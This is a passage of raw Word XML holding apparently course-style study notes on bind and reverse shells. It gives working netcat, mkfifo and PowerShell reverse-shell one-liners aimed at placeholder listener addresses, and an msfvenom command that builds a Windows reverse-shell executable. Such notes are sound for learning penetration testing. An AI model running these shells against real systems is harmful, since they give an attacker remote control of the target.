      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B20C1" w14:textId="01CE3570" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>executes bind shell on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4B91E" w14:textId="79AE5C9E" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124199A" w14:textId="7DBA7755" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580F77B" w14:textId="43244E72" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on windows, technique will work perfectly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E24733" w14:textId="73112B25" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74B126D2" w14:textId="246B0D51" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port&gt; &lt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f | /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f 2&gt;&amp;1; rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA9EAA" w14:textId="201A9D5D" w:rsidR="0097464B" w:rsidRPr="0084205E" w:rsidRDefault="0097464B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>command creates a named pip a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/f, then starts a netcat listener and connects input of the listener to the output of the named pipe. output of the netcat listener, the commands we send, get piped directly into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, sending the stderr output stream into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, and sending </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> itself into the input of the named pipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3813AAB0" w14:textId="48EF1D90" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>netcat reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E00AC" w14:textId="40969E67" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;LOCAL-IP&gt; &lt;PORT&gt; &lt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f | /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f 2&gt;&amp;1; rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47993A" w14:textId="51B90767" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">when targeting a modern Windows Server, common to require a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DED95" w14:textId="54000439" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "$client = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>System.Net.Sockets.TCPClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>('&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>&gt;',&lt;port&gt;);$stream = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>client.GetStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>();[byte[]]$bytes = 0..65535|%{0};while(($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>stream.Read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>($bytes, 0, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>bytes.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">)) -ne 0){;$data = (New-Object -TypeName </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>System.Text.ASCIIEncoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>GetString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>($bytes,0, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>);$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>sendback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> $data 2&gt;&amp;1 | Out-String );$sendback2 = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>sendback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 'PS ' + (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>).Path + '&gt; ';$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>sendbyte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAEEAAE" w14:textId="575AD2DE" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>replace IP and IP PORT with appropriate IP and choice of port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525875E6" w14:textId="49EE8BC4" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">then copied into cmd.exe shell or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74C23B" w14:textId="22B5F829" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>results in reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDF325" w14:textId="017CD2BC" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CAD1731" w14:textId="50A7B0A5" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>used to generate code for reverse and bind shells, among others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3087FA" w14:textId="0B5EA0F1" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>extensively used for lower-level exploit development</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4850EE41" w14:textId="4AD3F8E1" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generate hexadecimal shellcode when developing something like a Buffer Overflow exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FFB797" w14:textId="13FF8561" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can generate .exe, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, .war, and .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CAC8AA4" w14:textId="1D005C39" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>standard syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DEC289" w14:textId="198D77CA" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p &lt;payload&gt; &lt;options&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63393ECC" w14:textId="1716531B" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex – Windows x64 Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7EEA08" w14:textId="5AD51DAB" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p windows/x64/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -f exe -o shell.exe LHOST=&lt;listen-IP&gt; LPORT=&lt;listen-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE01731" w14:textId="3A921A47" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Staged versus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1206E778" w14:textId="0F67BBF8" w:rsidR="00044545" w:rsidRPr="0084205E" w:rsidRDefault="00044545" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>staged – sent in two parts. Stager – executed directly on server itself – connects back to a waiting listener</w:t>
      </w:r>
      <w:r w:rsidR="005846BE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, doesn’t </w:t>
      </w:r>
